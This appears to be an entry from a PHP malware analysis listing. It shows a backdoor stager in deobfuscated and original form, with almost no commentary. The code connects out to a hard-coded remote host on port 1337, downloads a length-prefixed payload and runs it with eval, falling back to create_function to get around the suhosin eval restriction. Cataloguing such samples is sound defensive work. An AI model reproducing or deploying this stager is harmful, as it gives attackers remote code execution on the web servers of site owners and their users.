PHP Malware Analysis

Back to list

Tags

Execution
eval
create_function
Environment
error_reporting

Deobfuscated code

-------------------------------------------------(Copy Given Code)-------------------------------------------------------------

/*<?php 
/**/
error_reporting(0);
$ip = 'vmi850151.contaboserver.net';
$port = 1337;
if (($f = 'stream_socket_client') && is_callable($f)) {
    $s = stream_socket_client("tcp://vmi850151.contaboserver.net:1337");
    $s_type = 'stream';
}
if (!$s && ($f = 'fsockopen') && is_callable($f)) {
    $s = fsockopen($ip, $port);
    $s_type = 'stream';
}
if (!$s && ($f = 'socket_create') && is_callable($f)) {
    $s = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
    $res = @socket_connect($s, $ip, $port);
    if (!$res) {
        die;
    }
    $s_type = 'socket';
}
if (!$s_type) {
    die('no socket funcs');
}
if (!$s) {
    die('no socket');
}
switch ($s_type) {
    case 'stream':
        $len = fread($s, 4);
        break;
    case 'socket':
        $len = socket_read($s, 4);
        break;
}
if (!$len) {
    die;
}
$a = unpack("Nlen", $len);
$len = $a['len'];
$b = '';
while (strlen($b) < $len) {
    switch ($s_type) {
        case 'stream':
            $b .= fread($s, $len - strlen($b));
            break;
        case 'socket':
            $b .= socket_read($s, $len - strlen($b));
            break;
    }
}
$GLOBALS['msgsock'] = $s;
$GLOBALS['msgsock_type'] = $s_type;
if (extension_loaded('suhosin') && ini_get('suhosin.executor.disable_eval')) {
    $suhosin_bypass = create_function('', $b);
    $suhosin_bypass();
} else {
    eval($b);
}
die;


Original code

-------------------------------------------------(Copy Given Code)-------------------------------------------------------------

/*<?php /**/ error_reporting(0); $ip = 'vmi850151.contaboserver.net'; $port = 1337; if (($f = 'stream_socket_client') && is_callable($f)) { $s = $f("tcp://{$ip}:{$port}"); $s_type = 'stream'; } if (!$s && ($f = 'fsockopen') && is_callable($f)) { $s = $f($ip, $port); $s_type = 'stream'; } if (!$s && ($f = 'socket_create') && is_callable($f)) { $s = $f(AF_INET, SOCK_STREAM, SOL_TCP); $res = @socket_connect($s, $ip, $port); if (!$res) { die(); } $s_type = 'socket'; } if (!$s_type) { die('no socket funcs'); } if (!$s) { die('no socket'); } switch ($s_type) { case 'stream': $len = fread($s, 4); break; case 'socket': $len = socket_read($s, 4); break; } if (!$len) { die(); } $a = unpack("Nlen", $len); $len = $a['len']; $b = ''; while (strlen($b) < $len) { switch ($s_type) { case 'stream': $b .= fread($s, $len-strlen($b)); break; case 'socket': $b .= socket_read($s, $len-strlen($b)); break; } } $GLOBALS['msgsock'] = $s; $GLOBALS['msgsock_type'] = $s_type; if (extension_loaded('suhosin') && ini_get('suhosin.executor.disable_eval')) { $suhosin_bypass=create_function('', $b); $suhosin_bypass(); } else { eval($b); } die();